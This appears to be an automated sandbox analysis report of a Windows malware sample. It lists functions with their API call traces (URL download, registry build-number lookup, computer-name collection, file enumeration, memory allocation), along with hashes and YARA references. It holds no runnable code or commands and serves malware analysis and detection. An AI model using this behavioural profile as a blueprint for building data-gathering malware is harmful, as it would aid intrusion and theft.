Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 1325379522-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
RtlAllocateHeap.NTDLL(00000000), ref: 00405590
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
InternetCloseHandle.WININET(?), ref: 0040562B
InternetCloseHandle.WININET(00000000), ref: 00405632

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
String ID:
API String ID: 1337183907-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

Function 0247003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D

Strings

kernel32.dll, xrefs: 0247008F, 02470095
cess, xrefs: 0247018D

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,00A0BC18), ref: 00404B17
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
InternetCrackUrlA.WININET(?,00000000), ref: 00404B47

Strings

<, xrefs: 00404B07

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
HeapAlloc.KERNEL32(00000000), ref: 004228CC
RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,00422849), ref: 004228EB
RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
RegCloseKey.ADVAPI32(00422849), ref: 0042290F

Strings

CurrentBuildNumber, xrefs: 004228FF

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
HeapAlloc.KERNEL32(00000000), ref: 0042283C

Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,00422849), ref: 004228EB
Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F

RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,?), ref: 00422871
RegQueryValueExA.KERNEL32(?,00A0E680,00000000,00000000,00000000,000000FF), ref: 0042288C
RegCloseKey.ADVAPI32(?), ref: 00422896

Strings

Windows 11, xrefs: 00422850

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4

Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F013
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F

Strings

ERROR, xrefs: 0041F028, 0041F089

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798

Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1

Function 009EE5C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009EE5EE
Module32First.KERNEL32(00000000,00000224), ref: 009EE60E

Memory Dump Source

Source File: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9ed000_1D71.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d05ae32c680828f4e274e87cf17e5fe563e66c18afe98a4458a86999640ac312
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 9BF09631200755AFD7313BF6AC8DB6E76ECAF99725F100528F646914C0DB70EC454A61

Function 02470E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5

Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795

Function 009EE285 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009EE2D6

Memory Dump Source

Source File: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9ed000_1D71.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 785defa48ff7a85d7394caf1d5d4d66becb50b8336be9291bd79491ea2f1dad4
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AB112B79A00208EFDB01DF99C985E98BBF5AF08351F058094F9489B362D771EE50EB80

Non-executed Functions

Function 02471807 Relevance: 172.2, APIs: 114, Instructions: 1164stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471880
lstrcpy.KERNEL32(00000000,00000000), ref: 024718D3
lstrcat.KERNEL32(00000000), ref: 024718DD
lstrcpy.KERNEL32(00000000,00000000), ref: 02471909
lstrcpy.KERNEL32(00000000,00000000), ref: 02471956
lstrcat.KERNEL32(00000000,00000000), ref: 02471960
lstrcpy.KERNEL32(00000000,00000000), ref: 0247198C
lstrcpy.KERNEL32(00000000,00000000), ref: 024719DC
lstrcat.KERNEL32(00000000), ref: 024719E6
lstrcpy.KERNEL32(00000000,00000000), ref: 02471A12
lstrcpy.KERNEL32(00000000,?), ref: 02471A5A
lstrcat.KERNEL32(00000000,00000000), ref: 02471A65
lstrlen.KERNEL32(00431D64), ref: 02471A70
lstrcpy.KERNEL32(00000000,00000000), ref: 02471A90
lstrcat.KERNEL32(00000000,00431D64), ref: 02471A9C
lstrcpy.KERNEL32(00000000,00000000), ref: 02471AC2
lstrcat.KERNEL32(00000000,00000000), ref: 02471ACD
lstrlen.KERNEL32(00431D68), ref: 02471AD8
lstrcpy.KERNEL32(00000000,00000000), ref: 02471AF5
lstrcat.KERNEL32(00000000,00431D68), ref: 02471B01

Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9

lstrcpy.KERNEL32(00000000,00000000), ref: 02471B2A
lstrcpy.KERNEL32(00000000,?), ref: 02471B75
lstrcat.KERNEL32(00000000,00000000), ref: 02471B7D
lstrlen.KERNEL32(00431D64), ref: 02471B88
lstrcpy.KERNEL32(00000000,00000000), ref: 02471BA8
lstrcat.KERNEL32(00000000,00431D64), ref: 02471BB4
lstrcpy.KERNEL32(00000000,00000000), ref: 02471BDD
lstrcat.KERNEL32(00000000,00000000), ref: 02471BE8
lstrlen.KERNEL32(00431D64), ref: 02471BF3
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C13
lstrcat.KERNEL32(00000000,00431D64), ref: 02471C1F
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C45
lstrcat.KERNEL32(00000000,00000000), ref: 02471C50
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C78
FindFirstFileA.KERNEL32(00000000,?), ref: 02471CAC
StrCmpCA.SHLWAPI(?,00431D70), ref: 02471CD7
StrCmpCA.SHLWAPI(?,00431D74), ref: 02471CF1
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471D2B
lstrcpy.KERNEL32(00000000,?), ref: 02471D62
lstrcat.KERNEL32(00000000,00000000), ref: 02471D6A
lstrlen.KERNEL32(00431D64), ref: 02471D75
lstrcpy.KERNEL32(00000000,00000000), ref: 02471D98
lstrcat.KERNEL32(00000000,00431D64), ref: 02471DA4
lstrcpy.KERNEL32(00000000,00000000), ref: 02471DD0
lstrcat.KERNEL32(00000000,00000000), ref: 02471DDB
lstrlen.KERNEL32(00431D64), ref: 02471DE6
lstrcpy.KERNEL32(00000000,00000000), ref: 02471E09
lstrcat.KERNEL32(00000000,00431D64), ref: 02471E15
lstrlen.KERNEL32(?), ref: 02471E22
lstrcpy.KERNEL32(00000000,00000000), ref: 02471E42
lstrcat.KERNEL32(00000000,?), ref: 02471E50
lstrlen.KERNEL32(00431D64), ref: 02471E5B
lstrcpy.KERNEL32(00000000,?), ref: 02471E7B
lstrcat.KERNEL32(00000000,00431D64), ref: 02471E87
lstrcpy.KERNEL32(00000000,00000000), ref: 02471EAD
lstrcat.KERNEL32(00000000,00000000), ref: 02471EB8
lstrcpy.KERNEL32(00000000,00000000), ref: 02471EE4
lstrcpy.KERNEL32(00000000,00000000), ref: 02471F47
lstrcat.KERNEL32(00000000,00000000), ref: 02471F52
lstrlen.KERNEL32(00431D64), ref: 02471F5D
lstrcpy.KERNEL32(00000000,00000000), ref: 02471F80
lstrcat.KERNEL32(00000000,00431D64), ref: 02471F8C
lstrcpy.KERNEL32(00000000,00000000), ref: 02471FB2
lstrcat.KERNEL32(00000000,00000000), ref: 02471FBD
lstrlen.KERNEL32(00431D64), ref: 02471FC8
lstrcpy.KERNEL32(00000000,?), ref: 02471FE8
lstrcat.KERNEL32(00000000,00431D64), ref: 02471FF4
lstrlen.KERNEL32(?), ref: 02472001
lstrcpy.KERNEL32(00000000,00000000), ref: 02472021
lstrcat.KERNEL32(00000000,?), ref: 0247202F
lstrcpy.KERNEL32(00000000,00000000), ref: 0247205B
